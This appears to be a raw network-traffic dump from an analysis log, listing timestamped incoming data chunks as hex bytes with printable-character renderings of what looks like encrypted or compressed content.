                                                                                                                                                    2022-09-29 12:59:00 UTC3820INData Raw: 9b a2 3a a5 37 e6 4f 96 9d 3f aa 2a ab 46 2f ff a0 96 5e e8 5d 68 e3 04 35 c5 31 44 87 3d c4 79 e8 f1 3b 94 e4 2c b2 d4 96 61 24 29 94 1e 6b 2c 76 28 a3 be 81 4a 80 0d e7 ae 27 8f 49 93 35 0b 67 b2 a3 b2 9d 20 dd eb 1e 88 b4 4a a6 b8 55 a8 4a 51 68 8a bd 7e 5a 84 18 82 42 c9 cf 5b aa 30 cf 31 c8 ae 69 b3 43 77 7d 9d 29 be e7 4f 37 26 c1 ce 7d 82 19 51 4e f5 e0 75 87 93 1d ad 60 44 36 4c 42 04 e8 ce 24 ff 85 9e df 66 74 d8 7a 35 ae bd d8 61 d5 b5 89 02 83 c7 69 d3 2f e9 e0 5c 17 9c c2 10 72 eb 32 b3 21 63 67 07 cf 81 55 d6 52 b5 06 53 5b 10 dc 39 26 1d 1d c6 3c 6b 39 19 af 0d fd ba 9a 47 95 69 58 bb 23 82 d3 9e ed d2 66 c5 b3 e5 b2 42 c9 8b ad d1 1f 28 21 66 7a 67 bb 2a 50 c9 c0 85 a6 bc ee 7e 31 34 aa 44 ab 6d dd f2 5f 1f 0a 37 46 64 bf b8 8d 63 69 2e dd
                                                                                                                                                    Data Ascii: :7O?*F/^]h51D=y;,a$)k,v(J'I5g JUJQh~ZB[01iCw})O7&}QNu`D6LB$ftz5ai/\r2!cgURS[9&<k9GiX#fB(!fzg*P~14Dm_7Fdci.
                                                                                                                                                    2022-09-29 12:59:00 UTC3836INData Raw: 7b 18 38 6d 14 e4 21 dd 95 0f 46 f9 88 40 97 13 5f 70 80 41 1c 09 c3 2f 33 d1 1c 99 14 48 19 9b 36 9c 52 ec a2 e5 d2 61 9d b9 a2 1c 6d d7 88 19 db 96 8b 4c 06 03 9a 7d 9f 21 e7 3f de b5 65 da dd d3 3c 30 e7 5c 20 b1 a0 6c d7 d7 61 8e 1d a9 7e e7 de 9a 6e b0 30 f5 7d 56 b0 48 1e 7a 2f 13 98 9c 3d 5a c5 3c 6e 04 e1 35 42 17 25 00 04 06 d2 2d 59 a8 5b d9 c8 3a 69 34 bc f6 78 9c d2 0a 8d 69 29 72 a9 28 59 6d bd a6 09 df 94 b7 f4 5b 17 03 21 c0 e7 c7 ac 73 50 8e 4f 00 27 a2 2e 8b ed 6b 9c f9 ac e6 2e fb 33 42 db 0e 2f 56 6b d5 2b 44 fb c9 05 4a 36 ef d8 6f 7c 45 27 6f 9b b2 b2 3c e9 50 82 fa 4f ba 76 93 01 cd 8a 73 7d ae 0e ff 8c bc 44 96 83 d6 84 bd c9 a5 f7 47 55 c5 43 35 29 83 e0 22 a7 0e 05 58 c8 61 f5 d2 a6 54 ba a6 0a 43 15 95 2e 94 a7 a7 10 c9 99 aa fa
                                                                                                                                                    Data Ascii: {8m!F@_pA/3H6RamL}!?e<0\ la~n0}VHz/=Z<n5B%-Y[:i4xi)r(Ym[!sPO'.k.3B/Vk+DJ6o|E'o<POvs}DGUC5)"XaTC.
                                                                                                                                                    2022-09-29 12:59:00 UTC3852INData Raw: ee d4 9c 57 04 7d 4a b0 61 65 d7 8a 7b 96 52 ac 73 3f 8d a7 29 c6 48 d0 15 ab d4 42 63 3a f9 42 5e 33 91 82 2e 12 a0 b7 20 73 0b 50 1d d4 a5 8c 3f 69 87 77 3a f0 04 02 9e 17 53 6c 38 71 f2 e4 09 2c 0e 47 5b 89 14 61 2a 29 cf 76 4b 44 2f 30 c1 a0 03 9d 71 df 99 e4 ae db dc 0f 95 eb 86 ae 60 05 b3 a8 fc 6b 00 1c a6 ae ab 67 8c 90 a6 4e 6a 8c e5 cb fd 0d 60 1b 9b 2b fc 81 8a aa 25 c4 a0 3f 05 ce 73 43 ba 43 ae b9 02 9f 0b e1 a2 70 af c3 b5 c9 30 e8 e4 1d db ef 44 11 a5 bb 63 2e 54 f9 b9 43 11 64 d6 c3 3b 49 a8 2a 8c 28 a8 c5 56 b3 fb 79 e3 e8 89 7e 2d 5a aa 22 61 f1 26 2c 43 b8 d8 8a 7b d5 5c 6d b9 76 36 02 92 d0 e5 d9 19 19 fd 8a 1f 97 0a 83 d7 c5 9c df 49 5b b1 06 70 f6 8c 3c 51 ef d2 9a 93 9e 9c e7 c9 e3 59 ef 0b b2 cf aa 3d 58 04 b7 08 e8 cc e4 a6 72 41
                                                                                                                                                    Data Ascii: W}Jae{Rs?)HBc:B^3. sP?iw:Sl8q,G[a*)vKD/0q`kgNj`+%?sCCp0Dc.TCd;I*(Vy~-Z"a&,C{\mv6I[p<QY=XrA
                                                                                                                                                    2022-09-29 12:59:00 UTC3868INData Raw: 55 c4 fd 7b b5 4f b0 eb 70 10 08 e8 ec 44 23 47 40 1c 3d 1f f2 48 fe c4 56 52 02 bd 41 57 a1 b0 df 1f 47 de 3e 6e b7 7d ec 83 b4 c8 d1 47 b3 57 af 83 2e a7 f7 d8 64 4e 94 07 fe 55 6b 52 4b 87 95 6e bc 5e 66 9a ca c6 f9 25 71 c3 50 7e ff 19 4a 44 a6 b3 89 0a 90 8d e6 1a 05 cc c8 7b 51 77 6d 92 c2 10 8c 5b fb 11 f2 54 f0 d1 5a 53 27 a9 5a 19 54 12 9e cb 7c a3 be 1f db 0d c8 01 0b 07 38 44 eb 43 73 b8 c5 47 ac de fa bc 6e 63 8e 50 1b 57 c1 7d 02 47 84 88 c2 7b c3 72 2a cd 6e 0a 18 c3 95 8f fe 0b 85 0d dd 12 81 e9 2c 02 e1 32 43 9e 83 5d 28 20 e9 b6 cd 0d 33 72 9d c3 42 a1 22 14 8e 01 ba e0 15 33 b6 42 3d 46 5a 6c ce 19 4e 0d 03 9a 89 41 5f 64 c4 f5 36 7d 19 7f a2 f1 18 8e 94 43 70 0c 08 1a 49 f1 7f 7d cb 8c ba b2 79 19 56 9f d8 b6 7c c2 9e 00 08 55 e7 b7 45
                                                                                                                                                    Data Ascii: U{OpD#G@=HVRAWG>n}GW.dNUkRKn^f%qP~JD{Qwm[TZS'ZT|8DCsGncPW}G{r*n,2C]( 3rB"3B=FZlNA_d6}CpI}yV|UE
                                                                                                                                                    2022-09-29 12:59:00 UTC3878INData Raw: 9d 47 4a 0c ae 39 ac 7e b8 37 a6 56 9e 2f 64 6e 5f 7d 9e 0e 08 4f ed 3c 2f e1 6a ee e1 2e c6 02 c9 dc 26 cf 82 b2 ff 88 06 54 83 12 33 de 26 d0 3d df 8a 14 36 ad f8 56 03 de 1c ad fe 0f 2b f4 5d 5e de db 80 85 da 90 a4 96 84 01 0d 40 38 9a e6 82 4d a6 a8 fd ea a4 b2 84 91 59 25 e8 ac 05 46 f7 87 91 1c 79 13 4a 17 d5 7d 28 75 bf c9 3c 42 a1 82 8a 34 74 27 0b f4 20 50 df 35 27 d9 8e a9 b4 31 13 a5 8e 17 27 df 73 50 e3 5d d6 4f 8e d4 ea b7 66 44 69 a3 c4 27 9a 83 15 18 5a 9a 2e f4 3d 05 d8 e7 f5 d3 e6 39 a7 02 62 df 29 9f ee cc b4 cf d2 62 fb ec 4a 30 05 74 de 52 4b ff 31 5b 21 10 fe 3b fd 1d 3d 72 48 2b de 37 79 03 a4 38 96 bc 35 d4 8e 73 9c b6 84 5a 4b 55 e6 da 73 63 44 fd b6 99 54 3b 09 f3 a2 2b da 79 86 60 82 c8 47 9f ee 51 75 0f 06 aa e9 ad f2 6f 17 43
                                                                                                                                                    Data Ascii: GJ9~7V/dn_}O</j.&T3&=6V+]^@8MY%FyJ}(u<B4t' P5'1'sP]OfDi'Z.=9b)bJ0tRK1[!;=rH+7y85sZKUscDT;+y`GQuoC
                                                                                                                                                    2022-09-29 12:59:00 UTC3894INData Raw: 1c d7 97 74 57 b2 21 70 79 fd c2 b1 13 d2 fc 79 f1 51 46 c4 91 1f d0 6d 10 56 a9 06 5c 93 da 8e 48 12 96 5c cf e3 49 df 40 a8 14 0e ba 0a 63 36 30 56 95 89 b4 b0 b9 f6 ae f4 1c de 6f d6 1b c6 4b 47 4d 85 bd 01 38 c1 1a 5f 1a 2f 7d 2f 5c 3e 14 95 6d 69 4d ac ff 8b e4 52 ca db cf 4c 07 84 8e b8 fb ec 7b bd eb f2 c7 31 b9 e0 9d 72 ca be 36 d6 b2 e3 69 bd 3c d3 d8 f8 8c 37 ee 06 5f b8 43 6f a6 c4 c5 4a ec 67 3f 17 28 af 9f 25 df 19 3f 72 06 4a fc d7 2d e6 94 db bd cd 17 5a e5 11 a2 40 e5 19 e9 75 2d 29 f4 5e 4c 76 ef 5b c4 0f b1 76 35 7a 84 a8 98 99 29 d6 5b df 48 f1 ae 35 63 7f 7d 72 43 80 7e 9f 12 c1 cc e5 7a d7 74 d1 f7 95 42 6b b4 05 c4 ed 6a 43 7f da 88 56 52 20 7e 4c a6 18 a0 dc b0 95 de 81 6c 8d 93 f1 ec 9e 2c f7 12 bb ea d4 a6 e3 b3 3b 64 4d a5 7c 3a
                                                                                                                                                    Data Ascii: tW!pyyQFmV\H\I@c60VoKGM8_/}/\>miMRL{1r6i<7_CoJg?(%?rJ-Z@u-)^Lv[v5z)[H5c}rC~ztBkjCVR ~Ll,;dM|:
                                                                                                                                                    2022-09-29 12:59:00 UTC3910INData Raw: f7 83 31 4c 2f b0 7b 94 d9 20 39 86 a4 a0 cf 77 fa a1 62 4e 02 ed 4d 64 c8 0f 0e eb a2 c4 89 a2 fd 77 e7 f6 f4 fe fa 7d b1 26 71 36 a3 43 af e9 08 9a 9d 86 45 7c 10 74 bd 91 e4 ba c8 1e d9 18 10 ce ca c7 e5 cd d0 55 0b 30 c9 62 32 d0 39 a3 81 88 4a 14 c1 6f 33 39 d8 82 b1 f9 ad 8b 91 a1 b7 c4 fc 1b e2 2f 5c ac 64 dd 9e 58 0f 88 47 0b 09 bc 69 1c 5b 29 f4 e4 86 ab f1 8e 8c 3f 87 fc 25 00 04 02 2b 56 07 1a 97 07 80 e7 10 7f f3 35 ca e9 6c a0 a3 12 ca 37 57 95 c9 90 69 ca 95 38 b6 8f 3c 44 15 2f ae 8e 3b 5f e8 72 46 86 75 06 ef 8a a8 88 5b dc 7b f6 08 af 15 48 bd 2b fc ed 07 81 4f 34 96 11 eb 60 e3 b7 93 64 4e 36 55 5b 81 aa bb 36 11 af 68 ec 46 3f 53 5a 5f 98 ea f4 3c fd fe 71 99 bd 8f 3c 0e aa 8a a8 2a 64 19 8d 4f 0a bf 4f f5 af 4f 91 fc 2f 17 c0 f3 87 3b
                                                                                                                                                    Data Ascii: 1L/{ 9wbNMdw}&q6CE|tU0b29Jo39/\dXGi[)?%+V5l7Wi8<D/;_rFu[{H+O4`dN6U[6hF?SZ_<q<*dOOO/;
                                                                                                                                                    2022-09-29 12:59:00 UTC3926INData Raw: 1f e7 3a 3d 4f 47 79 91 a1 70 e1 7e 8b e5 b2 a4 2f 30 12 93 9d dc 91 07 32 d0 e4 a9 24 d9 a4 e3 f6 31 38 f0 8d 4a ec f5 5b 35 0c a1 52 bd 6d 08 9e 18 00 83 a1 fc fc d3 e1 5b e1 20 d0 b6 88 b1 c3 c6 2d 72 5f 31 04 3c f1 e2 49 b6 dc 89 c5 cc a7 fa 21 3d b9 77 e0 f9 3c ed 79 ab 73 72 cf c4 9e 77 fc 66 a7 94 42 94 9e 80 8a 57 f8 86 96 b2 c9 4f 62 f9 ba b5 94 23 1d 59 12 df 11 24 45 c5 dd fc f8 12 61 cd 57 b1 80 ab 2a 00 b3 19 e2 c2 ea 00 54 f1 ce c0 e5 42 27 ee 49 4e 2b 38 87 59 e5 e8 60 fe 63 4e eb 57 11 e5 b4 d6 e7 25 6e b9 e6 f0 f2 00 ad b5 c3 85 74 c5 05 db 21 64 9d 9c 5e af 0c 2c ff 75 fb bd e1 0a 88 9c 3b 73 e2 34 48 28 98 dc 5f b6 88 79 c3 3f 5c 6c 93 61 aa 2c 52 5e 7f 65 3e bf a2 1a 87 ae fb 42 bc f3 ae cd 80 3e a5 9a fd 38 a1 8f a5 5c f5 27 a1 c0 4a
                                                                                                                                                    Data Ascii: :=OGyp~/02$18J[5Rm[ -r_1<I!=w<ysrwfBWOb#Y$EaW*TB'IN+8Y`cNW%nt!d^,u;s4H(_y?\la,R^e>B>8\'J
                                                                                                                                                    2022-09-29 12:59:00 UTC3942INData Raw: 76 ac 5c f3 6e d8 9f b9 5c 7f f0 36 cb da 1a 46 37 1c 6f 0c 6f 56 0f 96 70 f3 a1 8d 63 5e 1f 59 57 ae 40 d7 99 ad b6 f7 f1 87 a4 92 b3 11 da cb f4 c2 43 fa d8 f9 bf 63 23 1c 90 97 0e f9 0e 66 ba 1c c3 98 48 e1 80 85 84 31 23 00 20 e0 72 72 c6 41 d9 d1 3c 7c 2a 87 80 4e 41 3c 14 a2 bf db 2c 32 82 16 69 6e 36 db a9 03 22 3e a2 2c cf 3e 7a e1 64 f6 94 ba 0b ac 95 fb 19 d9 0e 22 d5 42 19 80 a2 5c 18 c5 62 bf df ef 4c 75 ae a8 41 96 51 ec f2 f7 49 4f d3 15 42 f5 da 96 f6 fd 4e c0 ee b7 1b c9 5c a4 ef f6 b5 05 64 84 92 7a e1 34 2b 58 4e 1f 13 eb 64 01 f1 d8 87 d0 69 d8 e1 f6 f2 57 ed f7 60 ef 2e e8 02 a8 f9 88 cf ad b3 eb 07 61 7c 59 cf e5 c0 4d 87 72 ea 63 54 ec c9 0c 0f a9 07 6b 69 0b 24 46 9d 21 a6 ee 1a 60 38 98 59 6d 81 31 d4 78 5a 8c 83 38 48 e0 70 a6 a3
                                                                                                                                                    Data Ascii: v\n\6F7ooVpc^YW@Cc#fH1# rrA<|*NA<,2in6">,>zd"B\bLuAQIOBN\dz4+XNdiW`.a|YMrcTki$F!`8Ym1xZ8Hp
                                                                                                                                                    2022-09-29 12:59:00 UTC3958INData Raw: c7 44 b8 db 24 07 28 23 aa 14 81 35 34 69 cb 45 9d 44 ce 8c f5 58 0d ef aa b6 56 b0 54 09 54 75 69 d0 0a ea e0 ae 31 0b 9a a3 6b 15 10 4c f5 f7 3e 5d a1 89 a7 b3 c9 13 aa a9 d0 f1 49 da 66 59 3c cd 0e 44 63 f7 f2 f4 75 e7 a8 0d 4c 37 ef 87 08 df f9 b5 07 30 d6 68 62 b8 1f 4b 0b ae c2 2d e9 bf 32 41 58 38 9b 2c 29 8c 4f 2c 6c bd 86 db be f3 21 19 34 2c e2 d6 22 77 38 7a 46 02 67 31 82 b2 30 03 53 59 16 13 d7 8b 15 08 3f cb 3d fb c9 47 85 4f f0 2c c3 02 62 45 cc ca 86 3f 1d 46 14 ae 27 5f 87 a9 2e 1b ae 2b 6c 65 03 b0 bd d8 59 7b 37 d7 99 e3 3a 52 3c 07 5e b7 5a b2 ff ac bc 92 16 0e b3 5a a5 d8 dc f0 ef eb 6d 3d 60 0b 9a c7 68 05 38 25 85 a5 78 2a 9c 02 b2 86 4c 46 6e 3d 5d 69 ea bb 9f 3f fa 31 ce f2 4a d6 5e 7e 26 1d 9f 8c a8 ed 4a 1d 30 19 01 12 bc bd 84
                                                                                                                                                    Data Ascii: D$(#54iEDXVTTui1kL>]IfY<DcuL70hbK-2AX8,)O,l!4,"w8zFg10SY?=GO,bE?F'_.+leY{7:R<^ZZm=`h8%x*LFn=]i?1J^~&J0
                                                                                                                                                    2022-09-29 12:59:00 UTC3974INData Raw: bb 3c 0d b0 6e e9 3a a4 02 54 02 42 23 90 94 55 40 3b 52 24 94 8e e9 10 b0 38 b9 22 19 5e 87 48 d8 06 69 ac 59 2f 0a 7c c4 0b d7 70 9a d6 f2 6a a1 de d6 c1 17 f0 72 38 a4 b3 35 7f d1 24 e0 0b 4f 1e 57 51 e2 f9 5e 85 bb 23 ed 0a 95 20 e4 7c 88 c7 d0 d6 23 b5 42 96 c7 e5 ef dd e7 cf 85 03 47 5d 2d 2c f1 c7 14 e7 fd 81 32 e2 e6 e0 e8 0a 8c de 5c 5c 8e d5 38 7c c5 c9 2a ae c1 46 e2 ff 01 b8 bf d7 9b 88 2e 18 2b da c7 83 0c f9 04 8d c8 6e 96 83 47 bd d7 87 8e 16 7f 13 19 ce 1f 02 0d 26 b8 4f 21 f1 b7 55 4a 22 be df c2 3e 08 64 0e ab 9a 44 f5 20 b9 b8 5c 18 b7 5c 80 11 46 79 6b 97 7f f0 4f 9f db bc a7 f3 6d 2c 71 97 61 d1 a8 77 08 c1 d2 5f 4a 1f fc 4e 6f 2b a4 39 b3 f2 84 27 1d 20 de 31 ae d6 52 cb 96 38 69 bb 1f f9 ee f4 f5 e2 e3 79 fc 74 be fc 3c 30 fe 14 06
                                                                                                                                                    Data Ascii: <n:TB#U@;R$8"^HiY/|pjr85$OWQ^# |#BG]-,2\\8|*F.+nG&O!UJ">dD \\FykOm,qaw_JNo+9' 1R8iyt<0
                                                                                                                                                    2022-09-29 12:59:00 UTC3990INData Raw: f4 c4 97 8c ab 0c 02 e7 ef 50 bd 97 ad 04 00 d2 9d b3 b9 c2 bc 38 36 15 7f f1 ba b3 a0 f0 79 15 8b 1a 59 06 eb 3d f5 7c ef 84 26 e7 85 35 a5 4b d5 32 81 45 7d 1d db d2 28 1d a8 45 c5 2d 1d f5 60 cc aa dc 58 8a 71 68 f9 e8 3b 10 fe ce 12 9f 44 2f fe ad 2f cd 88 e8 ee c0 51 b3 b0 54 b4 55 7d e5 f4 26 27 c4 da 61 da 39 26 16 30 80 28 2f 7d af e1 6f 38 08 35 04 58 6d 26 a1 dc c0 c0 4b a6 6e 1d 61 26 19 b5 26 fe bd 8a a6 ae 70 4c a8 4d 96 87 a5 7b e7 3c 25 ad 23 cc d2 93 b4 07 c5 6f 4f 98 f6 22 db 90 82 e6 9a 14 c0 f5 fa 6b 9c 91 04 df 05 90 41 15 5f e2 87 49 5f 0e e4 e5 9c 91 e4 aa b6 c9 27 28 cf 78 5b b4 ec 78 0b 30 e1 8b 54 c4 ca a4 74 77 c6 24 47 fe 17 d4 33 08 be dc 59 03 cf d0 ba 08 37 a9 8c 56 7b 6e 05 08 ed e1 23 64 6b 64 9f d8 2f 05 9d f3 97 71 7e 10
                                                                                                                                                    Data Ascii: P86yY=|&5K2E}(E-`Xqh;D//QTU}&'a9&0(/}o85Xm&Kna&&pLM{<%#oO"kA_I_'(x[x0Ttw$G3Y7V{n#dkd/q~
                                                                                                                                                    2022-09-29 12:59:00 UTC4006INData Raw: ff 6e 9b e6 89 01 ac 33 42 41 93 cc 7c 77 e6 d7 8e 30 ad 3b 7b be ef 93 4c 5b 50 02 bf e8 e0 a6 48 b7 b9 a5 f7 3b 5b 02 8c de 48 9d 38 bc 21 d0 27 50 ee 92 3c b7 03 28 0f c1 01 73 07 88 59 9b 0a 7d 41 2d bd 8d 22 2a 64 e4 c7 9a 84 a9 f6 0f 68 5a ed 27 7e ec 6d b5 1d 41 36 37 8f 28 c6 a9 4d 43 10 ee f8 33 96 b7 48 cf 92 33 9b 81 ce d6 16 d7 52 b8 89 d4 e2 2f 2e 65 23 b9 a8 db 0b 3f 40 b0 c9 e9 b7 14 a7 77 23 27 4b 4b 33 7d fa 00 43 5b 2c 47 89 31 12 6c 46 33 99 e0 3f 8d 63 ac 0a 53 2b 70 98 57 92 a8 16 bd 02 a7 2a ce 41 a4 ee 60 03 2e 2a 85 6a 6b 2f 79 57 57 81 a3 58 12 85 cd 90 e2 13 3e 58 ef dd 52 9b 78 7a b5 d8 bc 01 39 cc 78 02 91 23 6a 52 da 02 20 9a 46 25 5b 43 d9 2f dd ac 43 8b 5e 4f ef 60 3c ba 80 a6 17 1f c8 5c 81 9c 3f c5 20 65 d8 26 4d a2 c6 2e
                                                                                                                                                    Data Ascii: n3BA|w0;{L[PH;[H8!'P<(sY}A-"*dhZ'~mA67(MC3H3R/.e#?@w#'KK3}C[,G1lF3?cS+pW*A`.*jk/yWWX>XRxz9x#jR F%[C/C^O`<\? e&M.
                                                                                                                                                    2022-09-29 12:59:00 UTC4022INData Raw: 82 9e 8b cb a8 61 13 ce 71 e3 0b c7 1d d5 29 9f 3c 60 09 1c e7 ea 94 7e 33 10 df b3 2c a7 aa 8e bd 74 28 72 8c 62 cb 06 ca 47 f5 19 8e c2 a7 71 83 3b c5 26 3b 14 84 10 f0 b7 52 d6 78 3b 41 4f 88 ed 18 c6 de a8 0a 83 54 28 1d 00 20 8a 0a e8 ca b9 95 07 f0 d2 82 b0 89 85 93 f8 fd 44 9c 22 c8 19 e5 f7 f1 94 03 1f 91 3d 46 6a c8 73 70 9b ac b3 d2 78 de 7d bb 9e 3a 01 c4 5a 96 e1 a8 e9 53 ea 15 35 f4 e4 75 d7 4a 82 a8 94 4a cd 3d eb 69 9d 30 4f 07 1f b0 81 79 92 1e c9 72 10 60 41 d8 ee 5d 95 d8 85 5f 0f 35 60 5e c8 6c 95 85 e8 1b fc 0d b4 78 1a 84 29 4a 9b 85 5f a8 6d 87 5a 4d d2 01 5f 53 47 01 89 0b 59 e2 b4 66 83 63 0e c3 fc 7f 1e ff a3 a1 a6 13 b5 49 88 72 b6 2b 03 69 18 56 53 b8 ea 86 5c 98 f8 1f 64 87 d3 5e 10 d3 61 98 71 71 2d a5 95 50 0e ee 84 55 c5 17
                                                                                                                                                    Data Ascii: aq)<`~3,t(rbGq;&;Rx;AOT( D"=Fjspx}:ZS5uJJ=i0Oyr`A]_5`^lx)J_mZM_SGYfcIr+iVS\d^aqq-PU
                                                                                                                                                    2022-09-29 12:59:00 UTC4038INData Raw: f2 a8 02 c0 54 c8 fc c8 70 0f 4f a4 f3 74 53 06 1b 10 e7 28 d5 08 17 2b b8 9a 6b d6 c9 61 89 49 6e 0b 29 c1 c2 c8 20 54 3f 6b 8f 64 c1 eb 28 b4 f8 96 ac ab 0d 05 95 89 40 ae 2e 11 9c d1 ab 4a c7 33 d2 c9 cd fd 1e fc 60 a0 10 a9 54 86 7c 35 d4 1f b3 35 f1 4d f0 79 98 fd 79 97 0d ed 6f 52 93 5e dc 50 22 1e 55 5d 0e 10 c6 a2 a3 4b 71 a0 a8 ee 1f b7 f9 37 9c 8a d1 94 ee 23 0a 3e 30 b1 d2 31 a7 fc f2 45 ba 7c 7c ab cd f8 13 b4 bb 32 cf 78 c3 60 d6 e9 ec 5b a7 01 03 dd 12 27 b4 5b 01 f9 59 76 60 c2 55 a8 79 8f e8 5f d6 12 f7 dc da 8d 4e 2c 7c b4 2c 78 62 1d 41 8a e3 89 24 4d c3 85 3c 4a 2f 53 39 0a 5d 5a b7 d4 2d 4a ef 4e 86 46 33 44 8e 37 cc 44 de db e5 d6 0a 98 5e 7c 90 71 48 35 5e 3f 30 65 d2 b7 a9 fb c3 34 63 d6 31 45 39 25 ff 35 84 ce 8f 3a 97 da c8 7b c2
                                                                                                                                                    Data Ascii: TpOtS(+kaIn) T?kd(@.J3`T|55MyyoR^P"U]Kq7#>01E||2x`['[Yv`Uy_N,|,xbA$M<J/S9]Z-JNF3D7D^|qH5^?0e4c1E9%5:{
                                                                                                                                                    2022-09-29 12:59:00 UTC4054INData Raw: 8f ae 0b 42 82 60 29 5c da 6d c4 ec 3e 8e d7 4e d9 f2 9f a9 3b 1d 34 25 06 b8 c4 53 06 e5 36 19 a2 50 3f 8c c5 4f f6 1a 8d 7a cc 0d 0f b6 14 ea a7 d5 d8 4e ba 4f 21 93 67 53 e0 80 23 f0 2f b6 80 36 92 7b 31 35 ba e2 96 72 fd 9b dc 51 b8 11 9c 6c 91 4a ef ee 56 ed ad da 4a 3d 17 ab 16 36 6f 73 54 a1 83 58 e8 7d 25 a5 92 b9 16 f8 40 bb 16 8b e0 45 72 9a ff 14 b6 3c 0b b1 af e8 50 dc df 57 af 58 19 36 bb 1f d4 2c 4a 27 3c f4 0e 1a d6 ac af 57 b7 4c 95 ef 03 7e 47 96 ca 66 b4 67 f7 45 2d bd 23 22 2c 00 43 1d b3 cc 13 41 3b cc 29 29 90 36 ee 7d ef 99 cb 7a a0 1e 70 e1 e7 c0 f3 e8 d8 ef a8 87 7a 4d d1 37 42 06 f0 65 ec f7 26 cc 28 27 96 7c b4 1a 6b a7 8d 74 ce 5f e3 94 45 5c 43 30 e1 83 74 cd d2 e2 7d 64 56 3d db fd e8 d8 4e 32 43 2e 06 92 11 ed 2b f9 2a 6a e6
                                                                                                                                                    Data Ascii: B`)\m>N;4%S6P?OzNO!gS#/6{15rQlJVJ=6osTX}%@Er<PWX6,J'<WL~GfgE-#",CA;))6}zpzM7Be&('|kt_E\C0t}dV=N2C.+*j
                                                                                                                                                    2022-09-29 12:59:00 UTC4070INData Raw: a8 94 a1 5e 61 ca 64 bc 84 22 23 10 16 73 c5 e2 ca f4 5c da 53 0e 0c 31 db 23 f9 3f e8 e7 fc 78 7e e6 db e4 4b ba 24 22 51 c0 9c d2 cb ac 2a 45 12 8b f6 80 70 1e 0b 02 7c 25 a5 49 4b c7 8e 07 9d ed 04 07 90 0c b1 de 8a 71 5e e8 c8 82 0c 94 d6 7d 4c 67 0f 9d 82 e1 b4 f7 21 d0 4a 64 05 ef 69 28 d5 df c0 2c d4 58 a7 2b fc c7 e5 8f 42 34 1d 4a b5 1c 79 28 7f 4a c7 53 5f e8 53 ca 9d 45 e7 ce 70 09 20 50 dd 72 8a aa cf ee b3 5c 9d e3 02 80 3f 3a 06 36 43 42 22 d1 4e dd c6 21 ff cb fa 42 03 76 be 9c 88 b1 81 a6 65 91 1a 19 25 2b 96 90 f2 af 78 40 01 36 ca 53 c0 74 fd 58 55 0e 82 fd 80 e1 d6 6d 37 12 a4 b8 c7 85 92 84 2f e4 cc 6e 90 e4 25 48 de 07 94 9e 6b d1 ad b0 83 d7 00 29 7f 46 63 6d b6 6f 6d dd 13 0f 14 f9 d8 9f 5a e6 e6 9c 46 17 39 48 a0 b9 27 04 4a 1c ce
                                                                                                                                                    Data Ascii: ^ad"#s\S1#?x~K$"Q*Ep|%IKq^}Lg!Jdi(,X+B4Jy(JS_SEp Pr\?:6CB"N!Bve%+x@6StXUm7/n%Hk)FcmomZF9H'J
                                                                                                                                                    2022-09-29 12:59:00 UTC4086INData Raw: d3 c3 9c b0 54 fd dc 1b cd b3 72 1d 5d 67 cb 9f 07 dd 27 b3 2a 15 d1 7d 6d ab 3d cf 91 d4 de 44 79 95 83 73 b6 12 97 ce 48 78 5c 28 d3 52 d4 2a 62 cd 19 db 63 67 1b 0d 4f 02 09 47 c4 8d 2b 74 36 bd 13 c6 f5 d8 18 9f 2d 58 9b 8d 12 97 96 af 7b e2 db 95 bf 10 36 c2 20 04 8e 42 85 71 0d f9 a0 8b 5b 07 c9 4c 6d 25 02 5e c6 df b4 73 87 48 a0 4e 52 28 b8 a1 6f af ba 68 2e 95 2f 15 43 61 0b be 3c 24 57 25 22 e3 68 cc 04 26 c6 e9 12 6f 5b 21 3c 46 12 60 ae 16 80 10 a6 48 b8 0b 6d b1 50 3e 74 30 cd a2 52 15 8f 1e b7 aa ed 86 75 66 c9 c0 9d d2 a1 6f 16 d3 f5 a9 3d aa 04 72 d8 8e 54 47 c0 ae 03 c1 40 c4 94 4d 97 3a 63 bd 73 45 58 de 58 e9 0c 88 2a c1 f7 f6 ce 1b 24 7e a6 63 2a 93 1b 12 f6 f1 b5 07 6b 31 0d 6c 36 cc f8 dc 2a a9 bb 14 01 5a bb 66 15 ce ed dc 90 48 f9
                                                                                                                                                    Data Ascii: Tr]g'*}m=DysHx\(R*bcgOG+t6-X{6 Bq[Lm%^sHNR(oh./Ca<$W%"h&o[!<F`HmP>t0Rufo=rTG@M:csEXX*$~c*k1l6*ZfH
                                                                                                                                                    2022-09-29 12:59:00 UTC4102INData Raw: 86 94 08 3a 0b ac e6 07 ef b9 d1 dd f3 bc 0a d2 3d 04 5e c0 c3 1e 93 a5 42 b6 2d 8c cf 1a ba 6f ad aa 0c 55 1e 9c 9a fd 25 4b aa eb 5e ec 76 75 3b e0 0d 25 51 52 c7 88 c5 d0 c3 70 e9 8f 2c 16 0f 51 bd 7e 48 65 51 f4 71 54 36 c3 1d a1 10 4e 5a 10 0f 04 ae fb fd 44 ed 5c a9 00 f0 7f bb a2 76 b2 0a 93 9c 03 67 59 f8 67 58 46 af be b0 b8 d6 95 77 f8 76 cb 0b e9 9f 1a 62 67 13 fe 5b 19 46 56 98 41 73 4b a8 5e 76 91 7e dc 17 1f 57 c4 35 1e 5b d4 2b dd 9d ef 65 95 a6 e0 49 d2 e4 e3 dc a4 d4 df 06 d8 2f dd 54 cf 66 b9 c4 c6 9a df 4a c5 6b 20 4b 36 9a 65 21 0d 03 de 63 34 4b c6 75 e3 9b 3f e5 3a 93 45 d0 0a 8e 8b 60 e8 14 7c 44 9d 9c a6 b9 c3 83 ad fa eb b5 2e f4 21 ee 9d 69 c0 e8 dc c6 fa 1d 1b 82 cd 0d 35 57 be cd e1 76 fe 98 ea 8e 7d be 74 23 70 4f 70 8b d7 54
                                                                                                                                                    Data Ascii: :=^B-oU%K^vu;%QRp,Q~HeQqT6NZD\vgYgXFwvbg[FVAsK^v~W5[+eI/TfJk K6e!c4Ku?:E`|D.!i5Wv}t#pOpT
